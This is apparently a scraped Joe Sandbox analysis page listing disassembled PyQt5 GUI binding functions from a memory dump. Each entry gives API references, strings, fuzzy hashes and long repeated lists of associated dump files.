Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: Point@Point@@Vector2malloc
String ID: QVector2D$toPoint$toPoint(self) -> QPoint
API String ID: 832002611-770779076
Opcode ID: 2ba06dff61378f192eb4e8cc02cae05cdcc71e72871804d19925f7616b93bc3a
Instruction ID: f0a55f2354ed9ddbc7b2f514d957ec0c98579ab821d7df574971e9484a22f172
Opcode Fuzzy Hash: 2ba06dff61378f192eb4e8cc02cae05cdcc71e72871804d19925f7616b93bc3a
Instruction Fuzzy Hash: 73115B75B08A46C1EB00EF65E8A96AD33A4FF44BA0F954072CA1D03320DF7DD989C340

Function 00007FFD86261000 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON

Download Yara Rule

APIs

PyBool_FromLong.PYTHON3 ref: 00007FFD8626105C

Strings

QRgba64, xrefs: 00007FFD86261082
isTransparent, xrefs: 00007FFD8626107B
isTransparent(self) -> bool, xrefs: 00007FFD8626106F

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: Bool_FromLong
String ID: QRgba64$isTransparent$isTransparent(self) -> bool
API String ID: 2610644205-1497664883
Opcode ID: 2ecdd9667ac4279d44a0e59a452937f84d3c12f18cec8a481e06f3bb7ad12366
Instruction ID: e0087a1dc138ddadf34030e9aa0d6ef081015a0ba8c14ffce8f446834714f01e
Opcode Fuzzy Hash: 2ecdd9667ac4279d44a0e59a452937f84d3c12f18cec8a481e06f3bb7ad12366
Instruction Fuzzy Hash: 78015E76B08B4681EB009F65E8986AC33A8FF44B60F990036DE5D03320DF78D999C340

Function 00007FFD86280FF0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFD86349D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFD862212CB), ref: 00007FFD86349D32

?text@QTextFragment@@QEBA?AVQString@@XZ.QT5GUI ref: 00007FFD86281048

Strings

QTextFragment, xrefs: 00007FFD86281087
text(self) -> str, xrefs: 00007FFD86281074
text, xrefs: 00007FFD86281080

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?text@Fragment@@String@@Textmalloc
String ID: QTextFragment$text$text(self) -> str
API String ID: 3991678780-2304076931
Opcode ID: b6b2f7f3ec7472fd95d3c227471d8b9a1a64891c87092fc38ff69a7e03e2baa4
Instruction ID: 59966096f1274823b1ba9f2b00c301b118ab96bc9372e9fa05a6029c3196ff0e
Opcode Fuzzy Hash: b6b2f7f3ec7472fd95d3c227471d8b9a1a64891c87092fc38ff69a7e03e2baa4
Instruction Fuzzy Hash: 25111775B08A8681EB00EF65E8A97AD33A4FF54BA4F954072CA4D43320DF7DD949C380

Function 00007FFD8628CFF0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFD86349D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFD862212CB), ref: 00007FFD86349D32

?begin@QTextBlock@@QEBA?AViterator@1@XZ.QT5GUI ref: 00007FFD8628D048

Strings

QTextBlock, xrefs: 00007FFD8628D087
begin, xrefs: 00007FFD8628D080
begin(self) -> QTextBlock.iterator, xrefs: 00007FFD8628D074

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?begin@Block@@TextViterator@1@malloc
String ID: QTextBlock$begin$begin(self) -> QTextBlock.iterator
API String ID: 1119016579-2453734059
Opcode ID: 3c3e34197c2e943b3715bb43581e37eb7ef95c0fe25dfc72ee852187a2be22ca
Instruction ID: 42cad2efa70ae94258f08eb1067ecf6ae98018e4359254563bf954ac261cd0b7
Opcode Fuzzy Hash: 3c3e34197c2e943b3715bb43581e37eb7ef95c0fe25dfc72ee852187a2be22ca
Instruction Fuzzy Hash: 1E111B75B0CA56C1EB00DF65E8696AD37A4FB58BA4F954072CA4D03320DF7DD949C340

Function 00007FFD86278FE0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFD86349D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFD862212CB), ref: 00007FFD86349D32

?fontFamily@QTextCharFormat@@QEBA?AVQString@@XZ.QT5GUI ref: 00007FFD86279038

Strings

fontFamily(self) -> str, xrefs: 00007FFD86279064
QTextCharFormat, xrefs: 00007FFD86279077
fontFamily, xrefs: 00007FFD86279070

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?fontCharFamily@Format@@String@@Textmalloc
String ID: QTextCharFormat$fontFamily$fontFamily(self) -> str
API String ID: 2270711680-1411450789
Opcode ID: 1a79a2090969df1e7245aeab2ead49dd97d6e55c8399450614e2c0a73015d728
Instruction ID: 4a5b462a8bfb3c7d3795341131395cec7cfc945e6fb4c92511700de2f8d0558b
Opcode Fuzzy Hash: 1a79a2090969df1e7245aeab2ead49dd97d6e55c8399450614e2c0a73015d728
Instruction Fuzzy Hash: BB111775B08A8681EB00EF65E8A97AD37A4FF58BA0F954072CA5D03320DF7DD949C740

Function 00007FFD8627AFE0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFD86349D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFD862212CB), ref: 00007FFD86349D32

?capabilities@QTouchDevice@@QEBA?AV?$QFlags@W4CapabilityFlag@QTouchDevice@@@@XZ.QT5GUI ref: 00007FFD8627B038

Strings

options, xrefs: 00007FFD8627B070
options(self) -> QSurfaceFormat.FormatOptions, xrefs: 00007FFD8627B064
QSurfaceFormat, xrefs: 00007FFD8627B077

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: Touch$?capabilities@CapabilityDevice@@Device@@@@Flag@Flags@malloc
String ID: QSurfaceFormat$options$options(self) -> QSurfaceFormat.FormatOptions
API String ID: 3592115059-343581948
Opcode ID: b00321ef1c75929b8c3db2575c698919563e8cf89151f2edfa73000503061a11
Instruction ID: 23f9417bff25dc08214f7d6f53735e68c8939e8256afca15397905d06b4e8fed
Opcode Fuzzy Hash: b00321ef1c75929b8c3db2575c698919563e8cf89151f2edfa73000503061a11
Instruction Fuzzy Hash: FB111B75B08A4681EB00EF65E8697AD37A4FF54BA0F954076CA1D07320DF7DD949C740

Function 00007FFD862A3040 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFD86349D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFD862212CB), ref: 00007FFD86349D32

?normalized@QQuaternion@@QEBA?AV1@XZ.QT5GUI ref: 00007FFD862A3098

Strings

QQuaternion, xrefs: 00007FFD862A30D7
normalized(self) -> QQuaternion, xrefs: 00007FFD862A30C4
normalized, xrefs: 00007FFD862A30D0

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?normalized@Quaternion@@malloc
String ID: QQuaternion$normalized$normalized(self) -> QQuaternion
API String ID: 2006324559-1709848376
Opcode ID: 800be88ef05dae50fad06f6816ea04e8a822ce97f0151c725ebe1d271567deed
Instruction ID: eb5db48456b367c109d615731bdc9685a25c7e99ad785cca7a51be0346e35004
Opcode Fuzzy Hash: 800be88ef05dae50fad06f6816ea04e8a822ce97f0151c725ebe1d271567deed
Instruction Fuzzy Hash: 78115775B08A8691EB00EF65E8A87AD33A4FF44BA4F954072CA4D47320DF7DD949C340

Function 00007FFD8627CCD0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON

Download Yara Rule

APIs

?setColorSpace@QSurfaceFormat@@QEAAXW4ColorSpace@1@@Z.QT5GUI ref: 00007FFD8627CD32

Strings

setColorSpace(self, colorSpace: QSurfaceFormat.ColorSpace), xrefs: 00007FFD8627CD55
setColorSpace, xrefs: 00007FFD8627CD61
QSurfaceFormat, xrefs: 00007FFD8627CD68

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: Color$?setFormat@@Space@Space@1@@Surface
String ID: QSurfaceFormat$setColorSpace$setColorSpace(self, colorSpace: QSurfaceFormat.ColorSpace)
API String ID: 522240695-2969177202
Opcode ID: 6f54cfc8d2878f6e343653fbdf7890e621556741bfbf848c8072ca5c0bf2a2cd
Instruction ID: daa2d78c48ff974d691acd2869ceac2b6ac72ba30193164887f96b6aa35c3179
Opcode Fuzzy Hash: 6f54cfc8d2878f6e343653fbdf7890e621556741bfbf848c8072ca5c0bf2a2cd
Instruction Fuzzy Hash: A111F275B18F4692EB00EF15E8996AD33B5FB48BA4FA50132CA5D03320DF39E95AC700

Function 00007FFD86276CB0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFD86349D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFD862212CB), ref: 00007FFD86349D32

?documentXmpMetadata@QPdfWriter@@QEBA?AVQByteArray@@XZ.QT5GUI ref: 00007FFD86276D08

Strings

documentXmpMetadata(self) -> QByteArray, xrefs: 00007FFD86276D34
QPdfWriter, xrefs: 00007FFD86276D47
documentXmpMetadata, xrefs: 00007FFD86276D40

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?documentArray@@ByteMetadata@Writer@@malloc
String ID: QPdfWriter$documentXmpMetadata$documentXmpMetadata(self) -> QByteArray
API String ID: 2344305493-3289205201
Opcode ID: 1dd3f1c99369214a22746853ca3a3494d51f06182484fdfd84dc4e0eebf152d5
Instruction ID: 8482a90fb6bd142b88750142b4d493cc8d71c7f6ab3d5aea4ac5a955da02c9b2
Opcode Fuzzy Hash: 1dd3f1c99369214a22746853ca3a3494d51f06182484fdfd84dc4e0eebf152d5
Instruction Fuzzy Hash: 7B113575B08A4681EB00AF65E8A97AD33A4FF88BA4F954072CA1D03320DF7DD949C380

Function 00007FFD86246CF0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFD86349D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFD862212CB), ref: 00007FFD86349D32

?baseUrl@QTextDocument@@QEBA?AVQUrl@@XZ.QT5GUI ref: 00007FFD86246D48

Strings

baseUrl(self) -> QUrl, xrefs: 00007FFD86246D74
QTextDocument, xrefs: 00007FFD86246D87
baseUrl, xrefs: 00007FFD86246D80

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?baseDocument@@TextUrl@Url@@malloc
String ID: QTextDocument$baseUrl$baseUrl(self) -> QUrl
API String ID: 3057789347-3520599434
Opcode ID: 2ebf3bdf54f735a4c0bd864a0acdd42a419b9893314d5a2cfb62c60ab0faf548
Instruction ID: e6397457894945c2fc0868ce8ebdaa1107ca545a7722adee910442daec129a20
Opcode Fuzzy Hash: 2ebf3bdf54f735a4c0bd864a0acdd42a419b9893314d5a2cfb62c60ab0faf548
Instruction Fuzzy Hash: E8111B75B08A4681EB00EF65E8A97AD33A4FB44BA0F954072CA5D03360DF7CD949C340

Function 00007FFD86278D40 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFD86349D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFD862212CB), ref: 00007FFD86349D32

